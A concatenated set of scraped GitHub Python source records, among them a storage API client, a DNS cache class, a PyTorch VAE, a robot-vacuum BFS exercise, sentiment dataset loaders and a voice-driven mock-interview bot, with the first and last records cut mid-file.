fields=TokenResponse.fields()\n )\n\n # convert to object and deliver token\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n delivery_response = token_response.deliver_token()\n\n # wait for recipe completion\n self._wait_on_recipes(delivery_response, mutation_name)\n\n npod_uuid = delivery_response[\"npod_uuid_to_wait_on\"]\n npod_list = self.get_npods(\n npod_filter=NPodFilter(\n uuid=UUIDFilter(\n equals=npod_uuid\n )\n )\n )\n\n if npod_list.filtered_count != 0:\n return npod_list.items[0]\n\n return None","repo_name":"Nebulon/nebpyclient","sub_path":"nebpyclient/api/npods.py","file_name":"npods.py","file_ext":"py","file_size_in_byte":73636,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"38680429372","text":"import numpy as np\r\n\r\ndef to_array(str):\r\n arr = np.array([])\r\n memory = \"\"\r\n for c in str:\r\n if c == \",\":\r\n arr = np.append(arr, memory)\r\n memory = \"\"\r\n else:\r\n memory += c\r\n if memory != \"\":\r\n arr = np.append(arr, memory)\r\n return arr\r\n\r\ndef main():\r\n arr = []\r\n f = open(\"mushrooms_data.txt\", \"r\")\r\n # print(f.read())\r\n for line in f:\r\n stripped_line = line.strip()\r\n arr.append(to_array(stripped_line))\r\n return arr\r\n\r\ndef missing():\r\n arr = []\r\n f = open(\"mushrooms_data_missing.txt\", \"r\")\r\n # print(f.read())\r\n i = 0\r\n for line in f:\r\n stripped_line = line.strip()\r\n arr.append(to_array(stripped_line))\r\n return arr","repo_name":"ElyasafHadassi/machine","sub_path":"file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"647358653","text":"class _CacheEntry:\n \"\"\"\n Esta classe privada implementa uma entrada da cache.\n \"\"\"\n type_of_value_from_int = ('SOASP','SOAADMIN','SOASERIAL','SOAREFRESH','SOARETRY','SOAEXPIRE',\n 'NS','A','CNAME','MX','PTR')\n int_from_type_of_value = {'SOASP': 0, 'SOAADMIN': 1, 'SOASERIAL': 2, 'SOAREFRESH': 3, 'SOARETRY': 4,\n 'SOAEXPIRE': 5, 'NS': 6, 'A': 7, 'CNAME': 8, 'MX': 9, 'PTR': 10}\n origin_from_int = ('FILE','SP','OTHERS')\n def __init__(self, name: str, type_of_value: int, value, ttl: int, priority: int, origin,\n timestamp: int,index: int, status: int) -> None:\n self.name = name\n self.type_of_value = type_of_value\n self.value = value\n self.ttl = ttl\n self.priority = priority\n self.origin = origin # File->0, SP->1, OTHERS->2\n self.timestamp = timestamp\n self.index = index\n self.status = status # 0 = FREE, 1 = VALID\n\n def __str__(self) -> str:\n status = 'FREE' if self.status == 0 else 'VALID'\n return f'{self.name} {_CacheEntry.type_of_value_from_int[self.type_of_value]} {self.value} {self.ttl} {self.priority} {_CacheEntry.origin_from_int[self.origin]} {self.timestamp} {self.index} {status}'\n \n def passTimeEntry(self) -> None:\n \"\"\"\n Esta função avança 1 segundo no tempo desta entrada.\n \"\"\"\n self.ttl -= 1\n self.status = 1 if self.ttl > 0 else 0\n\n def changeData(self, name, type_of_value, value, ttl, priority, origin,\n timestamp) -> None:\n \"\"\"\n Esta função actualiza o valor da entrada.\n \"\"\"\n self.name = name\n self.type_of_value = type_of_value\n self.value = value\n self.ttl = ttl\n self.priority = priority\n self.origin = origin\n self.timestamp = timestamp\n self.status = 1\n\n\nclass Cache:\n\n # NAME | TYPE-OF-VALUE | VALUE | TTL | PRIORITY | ORIGIN (FILE,SP,OTHERS) |\n # TEMPO DESDE QUE O SERVIDOR ARRANCOU ATÉ INSERIR A ENTRADA\n # INDEX ([1,N]) | STATUS (FREE:0 OR VALID:1)\n\n def __init__(self) -> None:\n self.timestamp = 0 # em segundos\n self.entries = list([_CacheEntry('',-1,None,0,-1,None,0,1,0)])\n self.N = 1\n \n def __str__(self) -> str:\n res = ''\n for entry in self.entries:\n res += f'{str(entry)}\\n'\n return res\n\n def passTime(self) -> None:\n \"\"\"\n Esta função avança 1 segundo na cache.\n \"\"\"\n self.timestamp += 1\n for entry in self.entries:\n entry.passTimeEntry()\n\n def _findFreeEntry(self) -> int:\n \"\"\"\n Esta fun��ão devolve o índice da primeira entrada da tabela da cache com estado 'FREE'.\n Se não houver entradas livres, devolve -1.\n \"\"\"\n for i in range(self.N):\n if self.entries[i].status == 0:\n return i\n\n return -1\n\n def _isFull(self) -> bool:\n \"\"\"\n Esta função verifica se a cache está cheia, ou seja, todas as entradas têm status 'VALID'.\n \"\"\"\n result = True\n for entry in self.entries:\n if entry.status == 0:\n result = False\n break\n return result\n\n def addEntry(self,name: str, type_of_value, value, ttl: int, priority: int, origin):\n \"\"\"\n Este método adiciona uma entrada na cache.\n \"\"\"\n if self._isFull():\n self.N += 1\n self.entries.append(_CacheEntry(name,type_of_value,value,ttl,priority,origin,self.timestamp,self.N,1))\n else:\n p = self._findFreeEntry()\n self.entries[p].changeData(name,type_of_value,value,ttl,priority,origin,self.timestamp)\n \n def existsDomain(self,domain: str):\n \"\"\"\n Esta função verifica se existe nesta cache um certo domínio/nome.\n \"\"\"\n for entry in self.entries:\n if entry.status == 1 and entry.name == domain:\n return True\n\n return False\n\n def responseCode1(self, name:str,type_of_value: int):\n aux = [x for x in self.entries if (x.status == 1) and (x.type_of_value == type_of_value)]\n aux = set(map(lambda e: e.name,aux))\n return self.existsDomain(name) and (name not in aux)\n\n def responseCode2(self, name:str):\n return not self.existsDomain(name)\n\n\n def __getResponseValues(self,name: str, type_of_value: str):\n \"\"\"\n Esta função devolve os response values de uma query.\n \"\"\"\n int_from_type_of_value = {'SOASP': 0, 'SOAADMIN': 1, 'SOASERIAL': 2, 'SOAREFRESH': 3, 'SOARETRY': 4,\n 'SOAEXPIRE': 5, 'NS': 6, 'A': 7, 'CNAME': 8, 'MX': 9, 'PTR': 10}\n type_of_value_from_int = ('SOASP','SOAADMIN','SOASERIAL','SOAREFRESH','SOARETRY','SOAEXPIRE',\n 'NS','A','CNAME','MX','PTR')\n\n result = []\n for entry in self.entries:\n if (entry.name == name) and (entry.type_of_value == int_from_type_of_value[type_of_value]):\n prio = '' if entry.priority == -1 else f' {entry.priority}'\n string = f'{entry.name} {type_of_value_from_int[entry.type_of_value]} {entry.value} {entry.ttl}{prio}'\n result.append(string)\n return result\n \n def __getAuthoritiesValues(self,name: str):\n \"\"\"\n Esta função devolve os authorities values de uma query.\n \"\"\"\n return self.__getResponseValues(name,'NS')\n\n def __getExtraValues(self, response_values: list, authorities_values: list):\n \"\"\"\n Esta função devolve os extra values de uma query.\n \"\"\"\n rv_values = set(map(lambda s: s.split(' ')[2],response_values)) # vai buscar o campo value \n av_values = set(map(lambda s: s.split(' ')[2],authorities_values)) # vai buscar o campo value \n result = []\n for entry in self.entries:\n if (entry.type_of_value == 7) and ((entry.name in rv_values) or (entry.name in av_values)):\n prio = '' if entry.priority == -1 else f' {entry.priority}'\n string = f'{entry.name} A {entry.value} {entry.ttl}{prio}'\n result.append(string)\n return result\n\n def getQueryResponse(self, name: str, type_of_value: str):\n \"\"\"\n Esta função calcula a resposta a uma queria a partir da cache.\n \"\"\"\n response_values = self.__getResponseValues(name,type_of_value)\n authorities_values = self.__getAuthoritiesValues(name)\n extra_values = self.__getExtraValues(response_values,authorities_values)\n return (response_values,authorities_values,extra_values)\n","repo_name":"orlandopalmeira/Trabalhos-CC-2022-2023","sub_path":"Resoluções/TP2 Parte A/src/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"923293426","text":"\"\"\"utils for menu extras\"\"\"\nfrom ..models import MenuItemContainer\n\n\ndef make_tree_menu(menu_items: list[MenuItemContainer]) -> dict:\n \"\"\"Makes a tree menu as a dict\"\"\"\n # create dict with menu items dependencies\n items_with_keys = {}\n for menu_item in menu_items:\n if menu_item.parent_item_id in items_with_keys.keys():\n items_with_keys[menu_item.parent_item_id].append(menu_item)\n else:\n items_with_keys[menu_item.parent_item_id] = [menu_item]\n \n # check if there are layer with items without parent items\n if None not in items_with_keys.keys():\n raise ValueError(\"No root menu items (all menu items have parents.\")\n \n def create_recursive_tree(key):\n \"\"\"creates dict with menu\"\"\"\n # get current_layer\n layer = items_with_keys.get(key, None)\n\n if layer is None:\n return None\n \n # create tree\n tree_layer = {}\n for menu_item in layer:\n tree_layer[menu_item] = create_recursive_tree(menu_item.pk)\n\n return tree_layer\n \n return create_recursive_tree(None)\n\n\ndef find_in_tree(menu_tree: dict, url: str|None=None, url_name: str|None=None, names_list: list=[]) -> list:\n \"\"\"returns a list of names of menu items that are on the way to item with url\"\"\"\n # search for the menu item with specified url\n if menu_tree is None:\n return []\n\n new_names = names_list.copy()\n for menu_item in menu_tree.keys():\n if menu_item.url == url or (menu_item.url_name is not None and menu_item.url_name == url_name):\n new_names.append(menu_item.name)\n return new_names\n names_in_item = find_in_tree(menu_tree[menu_item], url, url_name, new_names + [menu_item.name])\n if names_in_item:\n return names_in_item\n \n return []\n","repo_name":"Snowdr0p/djnestedmenu","sub_path":"nested_menu/templatetags/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9372341263","text":"class Produto:\n def __init__(self, nome, descricao, valor):\n self.__nome = nome\n self.__descricao = descricao\n self.__valor = valor\n\n def desconto(self, porcentagem):\n \"\"\"\n Retorna o valor do produto com desconto\n :param porcentagem: O desconto que será dado em porcentagem\n :return: Valor do produto com desconto\n \"\"\"\n return (self.__valor * (100 - porcentagem)) / 100\n\n\nproduto = Produto('PS4', 'Video Game', 2400)\nprint(produto.desconto(20))\nprint(Produto.desconto(produto, 40))\n","repo_name":"PierreVieira/Python_Examples","sub_path":"Metodos.py","file_name":"Metodos.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70512298490","text":"#!/usr/bin/env python3.3\n# -*- coding: utf-8 -*-\nimport re\nfrom urllib.request import urlopen\ndef getw():\n global whea,temp,content\n url='http://www.cwb.gov.tw/pda/observe/real/46757.htm'\n whea='天氣現象.*\\n.*>(.*)'\n temp='溫度.*\\n([\\d.]+)'\n content = urlopen(url).read().decode()\ndef wea():\n global whea\n global content\n getw()\n wh = re.search(whea, content)\n res=\"天氣現象: {}\".format(wh.group(1))\n return res\ndef tem():\n global temp\n global content\n getw()\n t=re.search(temp,content)\n res=\"溫度: {} ℃\".format(t.group(1))\n return res\n","repo_name":"daniel0076/Python-IRC-Bot","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22786844136","text":"import torch\nfrom torch import nn\nimport numpy as np\n\n\nclass VAE(nn.Module):\n def __init__(self):\n super(VAE, self).__init__()\n\n self.encoder = nn.Sequential(\n nn.Linear(784, 256),\n nn.ReLU(),\n nn.Linear(256, 64),\n nn.ReLU(),\n nn.Linear(64, 20),\n nn.ReLU()\n )\n self.decoder = nn.Sequential(\n nn.Linear(10, 64),\n nn.ReLU(),\n nn.Linear(64, 256),\n nn.ReLU(),\n nn.Linear(256, 784),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n batchsz = x.size(0)\n # flatten\n x = x.view(batchsz, 784)\n # [b, 20] including mean and sigma\n h_ = self.encoder(x)\n # [b, 20] => [b, 10] and [b, 10]\n mu, sigma = h_.chunk(2, dim=1)\n # reparameterize trick\n h = mu + sigma * torch.randn_like(sigma)\n\n h_hat = self.decoder(h)\n # reshape\n h_hat = h_hat.view(batchsz, 1, 28, 28)\n\n kld = 0.5 * torch.sum(\n torch.pow(mu, 2) +\n torch.pow(sigma, 2) -\n torch.log(1e-8 + torch.pow(sigma, 2)) - 1\n ) / (batchsz*28*28) # np.prod(x.shape)\n\n return h_hat, kld\n","repo_name":"tianqingzx/markdown-notes","sub_path":"notes/Python编程技术/pytorch-learn/video/ae/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9259035770","text":"current_r, current_c, current_d = 7, 4, 0\ncurrent_room_map = [\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 1, 1, 0, 0, 0, 0, 1],\n [1, 0, 1, 1, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]\n]\n\n# 북 동 남 서\ndr = [-1, 0, 1, 0]\ndc = [0, 1, 0, -1]\n\n\n# 방향 전환\ndef get_d_index_when_rotate_to_left(d):\n return (d + 3) % 4\n\n# 후진\ndef get_d_index_when_go_back(d):\n return (d + 2) % 4\n\n\ndef get_count_of_departments_cleaned_by_robot_vacuum(r, c, d, room_map):\n n = len(room_map)\n m = len(room_map[0])\n count_of_departments_cleaned = 1 # 청소하는 칸의 개수\n room_map[r][c] = 2 # 청소 된 부분은 2로 표시\n queue = list([[r, c, d]])\n\n while queue: # queue 가 비워지면 종료\n r, c, d = queue.pop(0) # 첫번째 값 pop\n print(r, c, d)\n temp_d = d # 현재 방향 저장\n\n for i in range(4):\n temp_d = get_d_index_when_rotate_to_left(temp_d) # 현재 방향에서 왼쪽으로 돈 값 -> temp_d는 왼쪽 회전한 값\n new_r, new_c = r + dr[temp_d], c + dc[temp_d] # 현재 r,c에 현재 방향값 더해줌\n\n # 왼쪽 방향에 아직 청소하지 않은 공간이 존재한다면,\n # 그 방향으로 회전한 다음 한 칸을 전진하고 1번부터 진행\n if 0 <= new_r < n and 0 <= new_c < m and room_map[new_r][new_c] == 0:\n count_of_departments_cleaned += 1\n room_map[new_r][new_c] = 2\n # print(room_map)\n queue.append([new_r, new_c, temp_d])\n break\n\n # 모든 방향이 청소되어 있다면 뒤로 한 칸 후진\n elif i == 3: # 갈 곳이 없는 경우\n # 갈 곳이 없으므로 현재 d 값에서 연산\n # 지금 temp_d는 왼쪽으로 회전한 값이므로 사용 X\n new_r, new_c = r + dr[get_d_index_when_go_back(d)], c + dc[get_d_index_when_go_back(d)]\n queue.append([new_r, new_c, d])\n\n # 네 방향 모두 청소가 이미 되어 있거나 벽이면서 뒤쪽 방향이 벽이라 후진도 할 수 없는 경우 작동을 멈춘다\n # 즉 모든 방향을 봤는데 갈 곳이 없고 뒤도 벽인 경우 멈춤\n if room_map[new_r][new_c] == 1:\n return count_of_departments_cleaned\n\n\n# 57 가 출력되어야 합니다!\nprint(get_count_of_departments_cleaned_by_robot_vacuum(current_r, current_c, current_d, current_room_map))\n","repo_name":"rkdmf11/sparta_algorithm","sub_path":"week_4/homework/02_get_count_of_departments_cleaned_by_robot_vacuum.py","file_name":"02_get_count_of_departments_cleaned_by_robot_vacuum.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40982063317","text":"\"\"\"Configurations for this app.\"\"\"\nfrom sys import exit, stderr, argv\n\ntry:\n import secrets\n SECRET_KEY = secrets.SECRET_KEY\n NYT_COMMUNITY_KEY = secrets.NYT_COMMUNITY_KEY\n NYT_ARTICLE_SEARCH_KEY = secrets.NYT_ARTICLE_SEARCH_KEY\n DEBUG = (len(argv) == 2 and argv[1] == 'debug')\n STDOUT = (len(argv) == 2 and argv[1] == 'stdout')\n META_TITLE = 'Happy Times'\n META_DESCRIPTION = (\n 'Sometimes the Times are happy, sometimes they are sad. We\\'ll keep '\n 'you informed with a web application that\\'s rad.'\n )\n META_NAME = 'Happy Times'\n META_TWITTER_HANDLE = '@danrschlosser'\n META_DOMAIN = 'happytimes.schlosser.io'\n META_URL = 'http://' + META_DOMAIN\n META_IMAGE = 'static/img/favicon/mstile-310x150.png'\n\nexcept ImportError:\n print >> stderr, 'Could not find config/secrets.py. Do you have one?'\n exit(1)\n\nexcept AttributeError as e:\n attr = e.message.lstrip('\\'module\\' object has no attribute ').rstrip('\\'')\n print >> stderr, 'config/secrets.py is missing the key \"%s\"' % attr\n exit(1)\n","repo_name":"shree-shubham/times-bot","sub_path":"config/flask_config.py","file_name":"flask_config.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23564921252","text":"\"\"\"\nThis file contains the logic for loading data for all SentimentAnalysis tasks.\n\"\"\"\n\nimport os\nimport json, csv\nimport random\nfrom abc import ABC, abstractmethod\nfrom collections import defaultdict, Counter\nfrom typing import List, Dict, Callable\nfrom .data_processor import DataProcessor\n\n\nclass ImdbProcessor(DataProcessor):\n \"\"\"\n `IMDB `_ is a Movie Review Sentiment Classification dataset.\n\n we use dataset provided by `LOTClass `_\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.path = \"./datasets/SentimentAnalysis/imdb\"\n\n def get_examples(self, data_dir, split):\n examples = []\n if data_dir is None:\n data_dir = self.path\n label_file = open(os.path.join(data_dir, \"{}_labels.txt\".format(split)), 'r') \n labels = [int(x.strip()) for x in label_file.readlines()]\n with open(os.path.join(data_dir, '{}.txt'.format(split)),'r') as fin:\n for idx, line in enumerate(fin):\n text_a = line.strip()\n example = (text_a, int(labels[idx]), 0)\n examples.append(example)\n return examples\n \n\nclass AmazonProcessor(DataProcessor):\n \"\"\"\n `Amazon `_ is a Product Review Sentiment Classification dataset.\n\n we use dataset provided by `LOTClass `_\n \"\"\"\n\n def __init__(self):\n raise NotImplementedError\n super().__init__()\n self.path = \"./datasets/SentimentAnalysis/amazon\"\n\n def get_examples(self, data_dir, split):\n examples = []\n if data_dir is None:\n data_dir = self.path\n label_file = open(os.path.join(data_dir, \"{}_labels.txt\".format(split)), 'r') \n labels = [int(x.strip()) for x in label_file.readlines()]\n if split == \"test\": \n logger.info(\"Sample a mid-size test set for effeciecy, use sampled_test_idx.txt\")\n with open(os.path.join(self.args.data_dir,self.dirname,\"sampled_test_idx.txt\"),'r') as sampleidxfile:\n sampled_idx = sampleidxfile.readline()\n sampled_idx = sampled_idx.split()\n sampled_idx = set([int(x) for x in sampled_idx])\n\n with open(os.path.join(data_dir,'{}.txt'.format(split)),'r') as fin:\n for idx, line in enumerate(fin):\n if split=='test':\n if idx not in sampled_idx:\n continue\n text_a = line.strip()\n example = (text_a, int(labels[idx]), 0)\n examples.append(example)\n return examples\n\n\nclass SST2Processor(DataProcessor):\n \"\"\"\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.labels = [\"negative\", \"positive\"]\n self.path = \"./datasets/SentimentAnalysis/SST-2\"\n\n def get_examples(self, data_dir, split):\n examples = []\n if data_dir is None:\n data_dir = self.path\n path = os.path.join(data_dir,\"{}.tsv\".format(split))\n with open(path, 'r') as f:\n reader = csv.DictReader(f, delimiter='\\t')\n for idx, example_json in enumerate(reader):\n text_a = example_json['sentence'].strip()\n example = (text_a, int(example_json['label']), 0)\n examples.append(example)\n return examples\n\nPROCESSORS = {\n \"amazon\" : AmazonProcessor,\n \"imdb\": ImdbProcessor,\n \"sst-2\": SST2Processor,\n}\n","repo_name":"thunlp/OpenBackdoor","sub_path":"openbackdoor/data/sentiment_analysis_dataset.py","file_name":"sentiment_analysis_dataset.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"77"} +{"seq_id":"23782162915","text":"import foqus_lib.version.version as ver\n\ndef writeHelpFiles():\n #There are 4 main CCSI Packages used by FOQUS\n #\n # 1. FOQUS\n # 2. Turbine Client\n # 3. PSUADE\n # 4. ALAMO\n #\n # For now I'm going to ignore ALAMO and PSUADE they need to be installed separately\n # so I'm not going to worry about including their licenses.\n #\n # read the template for the HTML license files\n with open(\"html/licenseTemplate.html\", 'r') as f:\n template = f.read()\n #Both FOQUS and Turbine are CCSI Testing and Evaluation for now\n with open(\"../../LICENSE.md\", 'r') as f:\n lic = f.read()\n lic = lic.replace(\"\\n\", \"
\")\n template2 = template.replace(\"PKG_LICENSE\", lic, 1)\n newhtml = template2.replace(\"PKG_NAME\", \"FOQUS\")\n newhtml = newhtml.replace(\"[SOFTWARE NAME & VERSION]\", \"FOQUS \" + str(ver.version), 1)\n \n newhtml = newhtml.replace(\"PKG_COPYRIGHT\", ver.copyright)\n with open(\"html/foqus_license.html\", 'w') as f:\n f.write(newhtml)\n newhtml = template2.replace(\"PKG_NAME\", \"Turbine Client\")\n newhtml = newhtml.replace(\"[SOFTWARE NAME & VERSION]\", \"Turbine Client\", 1)\n newhtml = newhtml.replace(\"PKG_COPYRIGHT\", ver.copyright)\n with open(\"html/turbine_client_license.html\", 'w') as f:\n f.write(newhtml)\n\nif __name__ == '__main__':\n writeHelpFiles()\n","repo_name":"MAZamarripa/foqus","sub_path":"foqus_lib/help/writeCCSILicenseHelpFiles.py","file_name":"writeCCSILicenseHelpFiles.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"25035705605","text":"#!/usr/bin/env python3\n\nimport speech_recognition as sr\nfrom os import system\nimport random\nimport nltk\nimport time\nfrom tkinter import *\nimport tkinter as tk\nimport sys\nfrom Detect_Topic.naive_bayes_classifer import classify_topic\nfrom Check_Semantic_Similarity.sentence_similarity import find_similarity\nfrom utils import record_convo\nimport pickle\nimport spacy\n\n\nnlp = spacy.load('en_core_web_md')\n\n#load model\nwith open('./Detect_Topic/nb_classifier.pkl', 'rb') as f:\n clf = pickle.load(f)\nwith open('./Detect_Topic/count_vect.pkl', 'rb') as f:\n count_vect = pickle.load(f)\n\n\nintroduction = ['Tell me about yourself.',\n'Please introduce yourself.',\n'Tell me what motivates you about tech.',]\n\nprojects = ['can you please brief me about your contribution in {}',\n'Please explain what you did in the project named {}',\n'Your project seems intersting. Can you please explain about {}',\n'If you had to choose one project to explain, which one would it be? And why?',\n'Okay, Let us move our focus to your porject named {}',\n'I shall now ask you some questions related to your project {} . Can you tell me about it in brief.',\n'What did you learn in the course of your project {}'\n]\n\nexpertise = ['I see you have mentioned {} as your strength. Can you please explain why?',\n'How well are you versed in {}',\n'Now comes the intersting part. Tell me about your knowledge in {}',\n'What have you worked with in {}',\n'You have mentioned {} in your strong fields. Why do we use that?']\n\n#list of default questions\ndefaultQuestions = ['Can you tell me one important project you have done?',\n 'I assume you know about basic OOP. What do you think about object oriented programming?',\n 'Can you explain how memory is managed inside a modern computer?']\n\n\n\ntake_input = True\n\n\ndef voice_out(questionData,root):\n\n\tglobal ShowTextFrame\n\tglobal QuestionsAsked\n\tShowTextFrame = Frame(root,background = 'black')\n\tShowTextFrame.grid(row=10 , column=0)\n\t#cleardata = \" \"\n\n\tclear_data = \" \"*80\n\n\tname1 = Label(ShowTextFrame,text=clear_data,background = 'black',fg = 'white')\n\tname1.grid(row=2,column = 1,padx=100, pady=30)\n\n\tname1 = Label(ShowTextFrame,text=questionData,background = 'black',fg = 'white')\n\tname1.grid(row=2,column = 1,padx=100, pady=30)\n\t\n\tsystem('say %s' % (questionData))\n\n\t#ShowTextFrame.grid_forget()\n\tQuestionsAsked += 1 \n\treturn ShowTextFrame\n\n\nwith open('./Questions/hardware.txt','r') as pyfi:\n\thardwarelist = pyfi.readlines()\nwith open('./Questions/data_science.txt','r') as cfi:\n\tdata_sciencelist = cfi.readlines()\nwith open('./Questions/web_dev.txt','r') as algofi:\n\tweb_devlist = algofi.readlines()\n\nwith open('./Answers/hardware.txt','r') as pyfi:\n\tans_hardwarelist = pyfi.readlines()\nwith open('./Answers/data_science.txt','r') as cfi:\n\tans_data_sciencelist = cfi.readlines()\nwith open('./Answers/web_dev.txt','r') as algofi:\n\tans_web_devlist = algofi.readlines()\n\n# 'Hardware' 'Data Science' 'Data Science' 'Web Development'\ndef ask_topic(topic):\n\tprint (topic)\n\t\n\tif topic == 'Hardware':\n\t\task_id = random.randint(0,len(hardwarelist)-1)\n\t\tquestion = hardwarelist[ask_id]\n\t\tanswer = ans_hardwarelist[ask_id]\n\t\thardwarelist.remove(question)\n\t\tans_hardwarelist.remove(answer)\n\t\treturn (question,answer,1,)\n\n\n\tif topic == 'Data Science':\n\t\task_id = random.randint(0,len(data_sciencelist)-1)\n\t\tquestion = data_sciencelist[ask_id]\n\t\tanswer = ans_data_sciencelist[ask_id]\n\t\tdata_sciencelist.remove(question)\n\t\tans_data_sciencelist.remove(answer)\n\t\treturn (question,answer,1,)\n\n\tif topic == 'Web Development':\n\t\task_id = random.randint(0,len(web_devlist)-1)\n\t\tquestion = web_devlist[ask_id]\n\t\tanswer = ans_web_devlist[ask_id]\n\t\tweb_devlist.remove(question)\n\t\tans_web_devlist.remove(answer)\n\t\treturn (question,answer,1,)\n\ndef counter():\n if 'cnt' not in counter.__dict__:\n counter.cnt = 0\n counter.cnt += 1\n return counter.cnt\n\n\ndef process_input(user_input):\n\tcounter()\n\tif (counter.cnt < 2):\n\t\tchoosevaal = [1,2]\n\t\tcho = random.choice(choosevaal)\n\t\tif cho == 1 and len(ProgrammingLanguages) != 0:\n\t\t\tsent = random.choice(expertise)\n\t\t\texpertise.remove(sent)\n\t\t\topt = random.choice(ProgrammingLanguages)\n\t\t\treturn (sent.format(opt),\"\",0,)\n\t\telif len(knowledgeStack) != 0:\n\t\t\tsent = random.choice(projects)\n\t\t\tprojects.remove(sent)\n\t\t\topt = random.choice(knowledgeStack)\n\t\t\treturn (sent.format(opt),\"\",0,)\n\telse:\n\t\ttopics = (classify_topic(user_input,count_vect,clf))\n\t\treturn (ask_topic(topics[0]))\n\t\t\n#Get small quantum packets of input which we will treat as small sentences\ndef getQuantumInput():\n\tr = sr.Recognizer()\n\tr.pause_threshold = 0.2\n\tr.phrase_threshold = 0.1\n\tr.non_speaking_duration = 0.1\n\twith sr.Microphone() as source:\n\t\ttry:\n\t\t\taudio = r.listen(source, timeout = 4)\n\t\t\treturn audio\n\t\texcept sr.WaitTimeoutError:\n\t\t\tprint(\"Timed out\")\n\t\t\treturn None\n\n\n# get audio from the microphone\ndef get_input(questionData,ShowTextFrame):\n\tr = sr.Recognizer()\n\tInputList = []\n\tprint(questionData)\n\tShowTextFrame = voice_out(questionData,ShowTextFrame)\n\twhile(True):\n\t\tquantumInput = getQuantumInput() #call this for getting small sentences\n\t\tif (quantumInput == None): #if more than 5 sec pause in candidate answer then end answer\n\t\t\tprint(\"Processing...\")\n\t\t\tShowTextFrame.grid_forget()\n\t\t\treturn InputList\n\t\tInputList.append(quantumInput)\n\n\n\ndef getTextInput(questionData,ShowTextFrame):\n\t\n\t# r = sr.Recognizer()\n\t# TextList = []\n\t# AudioList = []\n\t# AudioList = get_input(questionData,ShowTextFrame)\n\t# #print(\"Got all audio inputs\")\n\t# print(AudioList)\n\t# for recordedAudio in AudioList:\n\t# \tTextSnippet = r.recognize_google(recordedAudio)\n\t# \tprint(\"-\" , TextSnippet)\n\t# \tTextList.append(TextSnippet)\n\t# #print(TextList)\n\t# return TextList\n\n\tShowTextFrame = voice_out(questionData,ShowTextFrame)\n\ttext_ip = sys.stdin.readline() \n\tTextList = nltk.sent_tokenize(text_ip)\n\treturn TextList\n\n\n\n####################\n#### MAIN MODULE ###\n####################\n\n\nQuestionsAsked = 0\ndef startInterview(ShowTextFrame,name,cpi,project1,project2,project3,programmingLanguages,POR1,POR2,POR3): \n\tproposedQuestion = \"I am Sid, your virtual questioner. \" + random.choice(introduction)\n\n\t\n\tglobal QuestionsAsked\n\tglobal knowledgeStack\n\tknowledgeStack = []\n\n\tglobal Name, Number_of_Questions ,Project1, Project2, Project3\n\tglobal ProgrammingLanguages\n\n\tProgrammingLanguages = []\n\n\tName = name\n\tNumber_of_Questions = cpi\n\tProject1 = project1\n\tProject2 = project2\n\tProject3 = project3\n\n\tprint (\"Number of Questions: \",Number_of_Questions)\n\tknowledgeStack.append(project1)\n\tknowledgeStack.append(project2)\n\n\tfor i in programmingLanguages.split(','):\n\t\t#knowledgeStack.append(i)\n\t\tProgrammingLanguages.append(i)\n\n\tprint(knowledgeStack)\n\n\tuser_input = [\"Hello\"]\n\n\tif Number_of_Questions.lower() == 'easy':\n\t\tnumber_of_Quest = 6\n\telif Number_of_Questions.lower() == 'medium':\n\t\tnumber_of_Quest = 8\n\telif Number_of_Questions.lower() == 'tough':\n\t\tnumber_of_Quest = 10\n\telse:\n\t\tnumber_of_Quest = 5\n\n\n\n\tquestionData = proposedQuestion\n\tsampleAnswer = \"\"\n\tanswer_avail_flag = 0\n\twhile(QuestionsAsked < number_of_Quest):\n\t\ttry:\n\t\t\tquestionData = proposedQuestion\n\t\t\tuser_input = getTextInput(questionData,ShowTextFrame)\n\t\t\tscore = 0\n\t\t\tif(answer_avail_flag):\n\t\t\t\tscore = find_similarity(sampleAnswer,user_input,nlp)\n\t\t\t\tprint(\"#\"*30)\n\t\t\t\tprint(\"Answer matching index: \",score)\n\t\t\t\tprint(\"#\"*30)\n\t\t\trecord_convo(questionData,user_input[0], sampleAnswer, score)\n\t\t\tproposedQuestion, sampleAnswer, answer_avail_flag = 